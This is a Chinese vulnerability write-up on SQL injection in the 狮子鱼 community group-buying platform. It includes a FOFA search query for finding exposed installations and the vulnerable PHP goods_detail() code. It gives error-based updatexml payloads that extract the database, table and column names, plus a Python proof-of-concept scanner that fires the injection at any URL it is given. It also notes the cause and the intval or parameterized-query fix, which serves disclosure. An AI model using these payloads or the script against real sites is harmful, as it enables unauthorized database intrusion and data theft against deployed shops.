狮子鱼
以小程序为载体,快速搭建基于社区社群社交资源的社区团购平台,帮助商家集中运营管理,轻松管理团长/商品/订单/配备货/售后/财务结算等主要销售场景。由快递代收点、社区物业、业主等发起的社区微信群,每个群都相当于一个社区店。
fofa搜索
body="/seller.php?s=/Public/login"
产生原因:goods_detail() 通过 I('get.goods_id') 直接读取请求参数,未做整型转换或参数绑定就拼接进 SQL 字符串(下方 g.goods_id=".$goods_id 与 goods_id=".$goods_id 两处),因此请求方可控的 goods_id 会改变查询语义。修复时应先用 intval() 强制为整数,或改用框架的参数化查询。
public function goods_detail()
{
$goods_id = I('get.goods_id');
//gallery =>img_url
//goods goods.goods_desc goods_name group_price market_price sell_count group_number
$sql="select g.*,gd.description,gd.summary,gd.tag from ".
C('DB_PREFIX')."goods g,".C('DB_PREFIX')."goods_description gd where g.goods_id=gd.goods_id and g.goods_id=".$goods_id;
$goods_arr=M()->query($sql);
$qian=array("\r\n");
$hou=array("<br/>");
$goods_arr[0]['summary'] = str_replace($qian,$hou,$goods_arr[0]['summary']);
$sql="select image from ".C('DB_PREFIX')."goods_image where goods_id=".$goods_id;
$goods_image=M()->query($sql);
$gallery = array();
$default_image = '';
foreach($goods_image as $val)
{
$val['img_url'] = str_replace('http','https',C('SITE_URL')).'/Uploads/image/'.$val['image'];
if(empty($default_image))
{
$default_image = str_replace('http','https',C('SITE_URL')).resize($val['image'], C('goods_thumb_width'), C('goods_thumb_height'));
}
$gallery[] = array('img_url' => $val['img_url']);
}
$goods = $goods_arr[0];
路径及参数位置
路径: /index.php?s=api/goods_detail&goods_id=1
漏洞复现
库名:1 and updatexml(0,concat(0x7e,(database())),0)
表名:1 and updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0)
字段名:1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='库名' and table_name='表名' limit 0,1),0x7e),1)
POC
# -*- coding:utf-8 -*-
import requests
import re
import json
import sys
import urllib3
urllib3.disable_warnings() # ignore HTTPS certificate warnings (POC() below calls requests with verify=False)
# Request path appended verbatim to the base URL given to POC(); the goods_id
# value is this page's test input for the goods_detail endpoint.
vunl_path = "/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)"
def POC(url):
    """Send a single GET to ``url`` + ``vunl_path`` and print the outcome.

    After the request completes, prints the address that was tested and,
    when the word "syntax" occurs in the response body, a notice that the
    address is affected. Any exception from the request path prints a
    failure message and terminates the process.

    Args:
        url: Base URL of the site under test; ``vunl_path`` (module level)
            is concatenated onto it without any normalisation.
    """
    full_url = url + vunl_path
    ua = (
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
        "(KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
    )
    try:
        # verify=False: certificate errors are deliberately ignored here.
        resp = requests.get(url=full_url, headers={"User-Agent": ua}, verify=False, timeout=10)
        print("正在测试:", full_url)
        affected = "syntax" in resp.text
    except Exception:
        print("请求失败!")
        # NOTE: exits with status 0 even though the request failed.
        sys.exit(0)
    if affected:
        print("上述地址存在SQL注入")
if __name__ == "__main__":
    # Print the intended command-line usage, then prompt interactively for the
    # base URL (input() already returns str, so no conversion is needed).
    print("python3 poc.py http://xx.xx.xx.xx")
    addr = input("Please input url")
    POC(addr)